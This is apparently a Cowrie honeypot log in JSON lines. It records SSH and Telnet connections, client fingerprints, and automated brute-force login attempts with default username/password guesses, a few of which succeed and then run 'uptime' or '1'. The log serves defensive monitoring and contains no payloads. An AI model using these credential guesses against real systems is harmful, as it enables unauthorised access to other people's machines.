{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:23:24.038899Z","src_ip":"212.227.235.229","session":"82e039bd4ece"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:23:24.039684Z","src_ip":"212.227.235.229","session":"82e039bd4ece"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1337","message":"login attempt [admin/1337] failed","sensor":"my-vps","timestamp":"2025-08-28T23:23:24.892426Z","src_ip":"212.227.235.229","session":"82e039bd4ece"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:23:26.059917Z","src_ip":"212.227.235.229","session":"82e039bd4ece"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51000,"dst_ip":"1.2.3.4","dst_port":22,"session":"36031ac44163","protocol":"ssh","message":"New connection: 217.72.205.35:51000 (1.2.3.4:22) [session: 36031ac44163]","sensor":"my-vps","timestamp":"2025-08-28T23:23:29.100882Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:23:29.101916Z","src_ip":"217.72.205.35","session":"36031ac44163"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59084,"dst_ip":"1.2.3.4","dst_port":22,"session":"afff252db4fe","protocol":"ssh","message":"New connection: 212.227.235.229:59084 (1.2.3.4:22) [session: afff252db4fe]","sensor":"my-vps","timestamp":"2025-08-28T23:24:10.916415Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:24:10.917548Z","src_ip":"212.227.235.229","session":"afff252db4fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50046,"dst_ip":"1.2.3.4","dst_port":22,"session":"b179f3195f37","protocol":"ssh","message":"New connection: 212.227.235.229:50046 (1.2.3.4:22) [session: b179f3195f37]","sensor":"my-vps","timestamp":"2025-08-28T23:24:16.474284Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:24:16.475556Z","src_ip":"212.227.235.229","session":"b179f3195f37"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T23:24:16.574582Z","src_ip":"212.227.235.229","session":"b179f3195f37"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop321","message":"login attempt [hadoop/hadoop321] failed","sensor":"my-vps","timestamp":"2025-08-28T23:24:16.975573Z","src_ip":"212.227.235.229","session":"b179f3195f37"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:24:18.078153Z","src_ip":"212.227.235.229","session":"b179f3195f37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51262,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce90ea189190","protocol":"ssh","message":"New connection: 212.227.125.160:51262 (1.2.3.4:22) [session: ce90ea189190]","sensor":"my-vps","timestamp":"2025-08-28T23:24:41.821270Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:24:43.218232Z","src_ip":"212.227.125.160","session":"ce90ea189190"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:24:43.220782Z","src_ip":"212.227.125.160","session":"ce90ea189190"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:24:48.676123Z","src_ip":"212.227.125.160","session":"ce90ea189190"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:24:52.268043Z","src_ip":"212.227.125.160","session":"ce90ea189190"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-28T23:24:52.268715Z","src_ip":"212.227.125.160","session":"ce90ea189190"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:24:53.481043Z","src_ip":"212.227.125.160","session":"ce90ea189190"}
{"eventid":"cowrie.session.closed","duration":"11.7","message":"Connection lost after 11.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:24:53.521782Z","src_ip":"212.227.125.160","session":"ce90ea189190"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":57538,"dst_ip":"1.2.3.4","dst_port":22,"session":"9433576c3848","protocol":"ssh","message":"New connection: 201.148.180.50:57538 (1.2.3.4:22) [session: 9433576c3848]","sensor":"my-vps","timestamp":"2025-08-28T23:25:03.609532Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:25:04.685021Z","src_ip":"201.148.180.50","session":"9433576c3848"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:25:04.685782Z","src_ip":"201.148.180.50","session":"9433576c3848"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:25:14.710237Z","src_ip":"201.148.180.50","session":"9433576c3848"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:25:18.096870Z","src_ip":"201.148.180.50","session":"9433576c3848"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-28T23:25:18.097836Z","src_ip":"201.148.180.50","session":"9433576c3848"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:25:19.693914Z","src_ip":"201.148.180.50","session":"9433576c3848"}
{"eventid":"cowrie.session.closed","duration":"16.1","message":"Connection lost after 16.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:25:19.695151Z","src_ip":"201.148.180.50","session":"9433576c3848"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55550,"dst_ip":"1.2.3.4","dst_port":22,"session":"88d7ae424d77","protocol":"ssh","message":"New connection: 212.227.125.160:55550 (1.2.3.4:22) [session: 88d7ae424d77]","sensor":"my-vps","timestamp":"2025-08-28T23:25:21.027141Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:25:21.028342Z","src_ip":"212.227.125.160","session":"88d7ae424d77"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T23:25:21.079074Z","src_ip":"212.227.125.160","session":"88d7ae424d77"}
{"eventid":"cowrie.login.failed","username":"solana","password":"solana","message":"login attempt [solana/solana] failed","sensor":"my-vps","timestamp":"2025-08-28T23:25:21.238042Z","src_ip":"212.227.125.160","session":"88d7ae424d77"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:25:22.290927Z","src_ip":"212.227.125.160","session":"88d7ae424d77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58018,"dst_ip":"1.2.3.4","dst_port":22,"session":"4504e7bc1dd4","protocol":"ssh","message":"New connection: 212.227.235.229:58018 (1.2.3.4:22) [session: 4504e7bc1dd4]","sensor":"my-vps","timestamp":"2025-08-28T23:25:29.162390Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T23:25:29.163077Z","src_ip":"212.227.235.229","session":"4504e7bc1dd4"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T23:25:29.293057Z","src_ip":"212.227.235.229","session":"4504e7bc1dd4"}
{"eventid":"cowrie.login.failed","username":"adrian","password":"adrian123","message":"login attempt [adrian/adrian123] failed","sensor":"my-vps","timestamp":"2025-08-28T23:25:29.902215Z","src_ip":"212.227.235.229","session":"4504e7bc1dd4"}
{"eventid":"cowrie.login.failed","username":"adrian","password":"abc123","message":"login attempt [adrian/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T23:25:31.034947Z","src_ip":"212.227.235.229","session":"4504e7bc1dd4"}
{"eventid":"cowrie.login.failed","username":"adrian","password":"abcd123","message":"login attempt [adrian/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T23:25:32.173501Z","src_ip":"212.227.235.229","session":"4504e7bc1dd4"}
{"eventid":"cowrie.login.failed","username":"adrian","password":"abcd1234","message":"login attempt [adrian/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T23:25:33.305276Z","src_ip":"212.227.235.229","session":"4504e7bc1dd4"}
{"eventid":"cowrie.login.failed","username":"adrian","password":"abc1234","message":"login attempt [adrian/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T23:25:34.437680Z","src_ip":"212.227.235.229","session":"4504e7bc1dd4"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:25:35.572509Z","src_ip":"212.227.235.229","session":"4504e7bc1dd4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44912,"dst_ip":"1.2.3.4","dst_port":23,"session":"49219d73bbbb","protocol":"telnet","message":"New connection: 212.227.125.160:44912 (1.2.3.4:23) [session: 49219d73bbbb]","sensor":"my-vps","timestamp":"2025-08-28T23:25:41.764230Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:25:41.848678Z","src_ip":"212.227.125.160","session":"49219d73bbbb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:25:41.865037Z","src_ip":"212.227.125.160","session":"49219d73bbbb"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T23:25:41.866002Z","src_ip":"212.227.125.160","session":"49219d73bbbb"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T23:25:41.866901Z","src_ip":"212.227.125.160","session":"49219d73bbbb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64001,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab4bd848b20a","protocol":"ssh","message":"New connection: 212.227.235.229:64001 (1.2.3.4:22) [session: ab4bd848b20a]","sensor":"my-vps","timestamp":"2025-08-28T23:27:22.722318Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:27:22.823487Z","src_ip":"212.227.235.229","session":"ab4bd848b20a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5","size":524,"shasum":"1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:28:41.879672Z","src_ip":"212.227.125.160","session":"49219d73bbbb"}
{"eventid":"cowrie.session.closed","duration":180.1185004711151,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:28:41.882653Z","src_ip":"212.227.125.160","session":"49219d73bbbb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38048,"dst_ip":"1.2.3.4","dst_port":22,"session":"788010fae976","protocol":"ssh","message":"New connection: 212.227.235.229:38048 (1.2.3.4:22) [session: 788010fae976]","sensor":"my-vps","timestamp":"2025-08-28T23:29:39.410275Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T23:29:39.411276Z","src_ip":"212.227.235.229","session":"788010fae976"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T23:29:39.542421Z","src_ip":"212.227.235.229","session":"788010fae976"}
{"eventid":"cowrie.login.failed","username":"daniel","password":"daniel","message":"login attempt [daniel/daniel] failed","sensor":"my-vps","timestamp":"2025-08-28T23:29:40.153893Z","src_ip":"212.227.235.229","session":"788010fae976"}
{"eventid":"cowrie.login.failed","username":"daniel","password":"abc123","message":"login attempt [daniel/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T23:29:41.285661Z","src_ip":"212.227.235.229","session":"788010fae976"}
{"eventid":"cowrie.login.failed","username":"daniel","password":"abcd123","message":"login attempt [daniel/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T23:29:42.417203Z","src_ip":"212.227.235.229","session":"788010fae976"}
{"eventid":"cowrie.login.failed","username":"daniel","password":"abcd1234","message":"login attempt [daniel/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T23:29:43.549296Z","src_ip":"212.227.235.229","session":"788010fae976"}
{"eventid":"cowrie.login.failed","username":"daniel","password":"abc1234","message":"login attempt [daniel/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T23:29:44.681185Z","src_ip":"212.227.235.229","session":"788010fae976"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:29:45.814791Z","src_ip":"212.227.235.229","session":"788010fae976"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39258,"dst_ip":"1.2.3.4","dst_port":23,"session":"041b5b94ceb9","protocol":"telnet","message":"New connection: 212.227.125.160:39258 (1.2.3.4:23) [session: 041b5b94ceb9]","sensor":"my-vps","timestamp":"2025-08-28T23:29:47.033760Z"}
{"eventid":"cowrie.session.closed","duration":12.776020765304565,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:29:59.809711Z","src_ip":"212.227.125.160","session":"041b5b94ceb9"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56432,"dst_ip":"1.2.3.4","dst_port":22,"session":"0013574cf88b","protocol":"ssh","message":"New connection: 217.72.205.35:56432 (1.2.3.4:22) [session: 0013574cf88b]","sensor":"my-vps","timestamp":"2025-08-28T23:30:23.888320Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:30:23.890039Z","src_ip":"217.72.205.35","session":"0013574cf88b"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":42741,"dst_ip":"1.2.3.4","dst_port":23,"session":"c51c66419fab","protocol":"telnet","message":"New connection: 221.202.210.63:42741 (1.2.3.4:23) [session: c51c66419fab]","sensor":"my-vps","timestamp":"2025-08-28T23:30:37.459615Z"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":42761,"dst_ip":"1.2.3.4","dst_port":23,"session":"63a6bdc25486","protocol":"telnet","message":"New connection: 221.202.210.63:42761 (1.2.3.4:23) [session: 63a6bdc25486]","sensor":"my-vps","timestamp":"2025-08-28T23:30:38.637163Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46130,"dst_ip":"1.2.3.4","dst_port":23,"session":"86e6f1115f98","protocol":"telnet","message":"New connection: 212.227.125.160:46130 (1.2.3.4:23) [session: 86e6f1115f98]","sensor":"my-vps","timestamp":"2025-08-28T23:30:42.032993Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:30:42.119638Z","src_ip":"212.227.125.160","session":"86e6f1115f98"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:30:42.137245Z","src_ip":"212.227.125.160","session":"86e6f1115f98"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T23:30:42.138866Z","src_ip":"212.227.125.160","session":"86e6f1115f98"}
